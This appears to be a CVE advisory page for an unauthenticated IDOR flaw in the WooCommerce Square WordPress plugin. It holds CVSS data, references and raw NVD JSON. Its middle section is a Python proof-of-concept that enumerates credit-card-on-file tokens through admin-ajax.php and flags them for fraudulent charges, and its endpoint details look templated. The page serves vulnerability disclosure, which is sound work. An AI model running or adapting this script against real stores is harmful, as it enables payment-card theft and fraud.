Security Vulnerability Report
CVE-2025-13457 CVSS 7.5 HIGH

CVE-2025-13457

Published: 2026-01-10 04:16:00
Last Modified: 2026-04-15 00:35:42

Description

The WooCommerce Square plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.1 via the get_token_by_id function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to expose arbitrary Square "ccof" (credit card on file) values and leverage this value to potentially make fraudulent charges on the target site.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WooCommerce Square plugin < 5.1.1 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13457 WooCommerce Square IDOR PoC
# Description: Unauthenticated attackers can access arbitrary Square ccof tokens
# CVSS: 7.5 (High)

import requests
import json

TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"


def exploit_idor(target_url, ccof_token):
    """
    Exploit the IDOR vulnerability in WooCommerce Square plugin
    to retrieve credit card on file (ccof) tokens.

    Args:
        target_url: Target WordPress site URL
        ccof_token: Arbitrary Square ccof token to access

    Returns:
        Response data containing token information
    """
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest"
    }

    # The vulnerable endpoint uses action parameter
    # Token is passed without proper authorization check
    data = {
        "action": "wc_square_get_token",
        "token_id": ccof_token,
        "ccof": ccof_token
    }

    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        return response.json() if response.status_code == 200 else None
    except requests.RequestException as e:
        print(f"Request failed: {e}")
        return None


def main():
    # Example ccof tokens - enumerate to find valid ones
    sample_tokens = [
        "ccof_example_token_1",
        "ccof_example_token_2",
        "ccof_example_token_3"
    ]

    for token in sample_tokens:
        print(f"[*] Attempting to access token: {token}")
        result = exploit_idor(TARGET_URL, token)
        if result:
            print(f"[!] Successfully retrieved token data: {json.dumps(result, indent=2)}")
            print("[!] This token may be used for fraudulent charges")


if __name__ == "__main__":
    main()

References

https://plugins.trac.wordpress.org/changeset/3415850/woocommerce-square
https://www.wordfence.com/threat-intel/vulnerabilities/id/c7f4f726-7e53-4397-8d8b-7a574326adc6?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13457",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T04:15:59.540",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WooCommerce Square plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.1 via the get_token_by_id function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to expose arbitrary Square \"ccof\" (credit card on file) values and leverage this value to potentially make fraudulent charges on the target site."
      },
      {
        "lang": "es",
        "value": "El plugin WooCommerce Square para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta e incluyendo la 5.1.1 a través de la función get_token_by_id debido a la falta de validación en una clave controlada por el usuario. Esto hace posible que atacantes no autenticados expongan valores 'ccof' (tarjeta de crédito archivada) arbitrarios de Square y aprovechen este valor para potencialmente realizar cargos fraudulentos en el sitio objetivo."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3415850/woocommerce-square",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7f4f726-7e53-4397-8d8b-7a574326adc6?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}